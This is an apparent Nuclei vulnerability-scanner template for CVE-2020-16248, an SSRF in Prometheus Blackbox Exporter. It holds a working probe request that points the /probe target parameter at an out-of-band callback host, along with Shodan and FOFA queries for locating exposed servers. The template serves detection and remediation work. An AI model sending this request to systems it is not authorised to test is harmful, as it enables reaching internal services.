id: CVE-2020-16248

info:
  name: Prometheus Blackbox Exporter - Server-Side Request Forgery (SSRF)
  author: DhiyaneshDk
  severity: medium
  description: |
    Prometheus Blackbox Exporter through 0.17.0 contains a server-side request forgery caused by unsanitized target parameter in /probe, letting attackers perform SSRF attacks, exploit requires sending crafted target parameter.
  impact: |
    Attackers can perform SSRF attacks, potentially accessing internal services or causing denial of service.
  remediation: |
    Update to version 0.17.1 or later to fix the vulnerability.
  reference:
    - https://github.com/prometheus/blackbox_exporter/issues/669
    - https://nvd.nist.gov/vuln/detail/CVE-2020-16248
    - https://prometheus.io/docs/operating/security/#exporters
    - https://www.openwall.com/lists/oss-security/2020/08/08/3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2020-16248
    epss-score: 0.0582
    epss-percentile: 0.90682
    cwe-id: CWE-918
  metadata:
    max-request: 1
    shodan-query: title:"Blackbox Exporter"
    fofa-query: title="Blackbox Exporter"
    verified: true
    vendor: prometheus
    product: blackbox_exporter
  tags: cve,cve2020,ssrf,prometheus,blackbox-exporter,oast,oob

http:
  - method: GET
    path:
      - "{{BaseURL}}/probe?target={{interactsh-url}}&module=http_2xx"

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - 'contains(body, "probe_dns_lookup_time_seconds")'
        condition: and
# digest: 490a00463044022044d763c5aefe395c3f1362b167b29634c6250e8d5971572022eed7b92ca51cb402205cd611ae63da58c8825dd2de40a63e67ed44fa958c99fdb715314901548a0b0a:922c64590222798bb761d5b6d8e72950